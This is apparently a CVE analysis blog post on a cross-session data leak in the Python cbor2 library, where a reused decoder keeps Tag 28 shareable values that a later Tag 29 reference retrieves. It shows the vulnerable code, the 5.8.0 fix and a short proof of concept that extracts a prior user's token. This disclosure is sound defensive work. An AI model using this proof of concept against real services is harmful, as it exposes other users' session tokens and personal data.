If you reuse a `CBORDecoder` instance to process messages from different users, the decoder remembers 'shareable' values (Tag 28) from the first user. A second user can reference those values (Tag 29) to extract secrets, creating a cross-context information leak.
A logic flaw in the popular Python `cbor2` library allows sensitive data from one decoding session to persist and bleed into subsequent sessions due to improper state management of the 'Value Sharing' feature.
Serialization libraries are usually the janitors of the software world: they quietly clean up data formats, move bytes around, and try not to get noticed. But cbor2, a popular Python library for the Concise Binary Object Representation (CBOR) format, decided to get a little too friendly.
At the heart of this issue is a specific feature of the CBOR standard: Value Sharing. To save bandwidth, CBOR allows you to mark a value as 'shareable' (Tag 28) and then reference it later by an index (Tag 29). It's basically a built-in compression mechanism.
The problem? cbor2 took the concept of 'sharing' a bit too literally. It turns out that if you reuse a decoder object—which many high-performance Python frameworks do to save initialization overhead—the library didn't bother to clear its memory between messages. It's like writing a secret on a whiteboard during a meeting and then inviting the next group in without erasing it.
The vulnerability lies in the CBORDecoder class. This class maintains an internal list called _shareables to track values marked with Tag 28. In a perfect world, this list would be ephemeral, existing only for the duration of a single decode() call.
However, in versions prior to 5.8.0, the cleanup logic was flawed. Specifically, when using helper methods like decode_from_bytes(), or if a developer simply reused a long-lived CBORDecoder instance, the _shareables list was not reset.
This created a State Pollution vulnerability. If User A sends a message containing a sensitive token marked as 'shareable', that token sits in the decoder's RAM. If User B (or an attacker) subsequently sends a message to the same decoder instance using a 'shared reference' (Tag 29), the decoder happily looks up the index in its stale memory and returns User A's token. No authentication, no boundary checks, just pure, unadulterated data leakage.
Let's look at the vulnerable implementation. The code prioritized swapping the file pointer (where data is read from) but forgot about the internal state (what data has been seen).
Here is a simplified view of the vulnerable flow in _decoder.py:
# The Vulnerable Way
def decode_from_bytes(self, buf: bytes) -> object:
with BytesIO(buf) as fp:
old_fp = self.fp
self.fp = fp
# loops over data, populating self._shareables
retval = self._decode()
# OOPS: self._shareables is NOT cleared here
self.fp = old_fp
return retvalThe fix introduced in version 5.8.0 is elegant. It introduces a recursion depth counter. We only want to wipe the memory when the top-level decoding is finished (depth 0), not in the middle of a nested structure.
# The Fixed Way (v5.8.0)
@contextmanager
def _decoding_context(self):
self._decode_depth += 1
try:
yield
finally:
self._decode_depth -= 1
# Only clear memory if we are back at the surface
if self._decode_depth == 0:
self._shareables.clear()
self._share_index = NoneThis ensures that _shareables only lives as long as the current message being processed.
Exploiting this is trivially easy if you can find an endpoint that reuses a cbor2 decoder instance. This is common in RPC services or custom protocol handlers that initialize the decoder once globally to avoid the overhead of object creation.
Step 1: The Setup (The Victim) The victim sends a legitimate payload. The application parses it.
# CBOR: Tag 28("AdminToken123")
# The decoder unknowingly caches "AdminToken123" at index 0
admin_payload = cbor2.dumps(cbor2.CBORTag(28, "AdminToken123"))
decoder.decode_from_bytes(admin_payload)Step 2: The Extraction (The Attacker) The attacker sends a payload that is syntactically valid but references a value they never defined. They simply ask for "Value #0".
# CBOR: Tag 29(0)
# The decoder retrieves index 0 from the PREVIOUS execution
attacker_payload = cbor2.dumps(cbor2.CBORTag(29, 0))
stolen_data = decoder.decode_from_bytes(attacker_payload)
print(f"Stolen: {stolen_data}")
# Output: Stolen: AdminToken123This is a classic "Oracle" attack where the system's own memory state serves as the oracle for the attacker.
A CVSS score of 4.0 (Medium) might make this seem like a nothingburger, but don't be fooled. The severity depends entirely on what is being serialized.
If cbor2 is used in a stateless web worker that dies after every request, this bug is unexploitable. However, if it is used in:
Then this becomes a critical data leak. You could leak session tokens, PII, or internal routing keys. It allows an attacker to peek into the request history of the server process.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L| Product | Affected Versions | Fixed Version |
|---|---|---|
cbor2 agronholm | >= 3.0.0, < 5.8.0 | 5.8.0 |
| Attribute | Detail |
|---|---|
| CWE | CWE-212 (Improper Removal of Sensitive Information) |
| Attack Vector | Network |
| CVSS v4.0 | 4.0 (Medium) |
| Exploit Status | PoC Available |
| Component | cbor2 Library |
| Patch Date | 2024-02-05 |
Get the latest CVE analysis reports delivered to your inbox.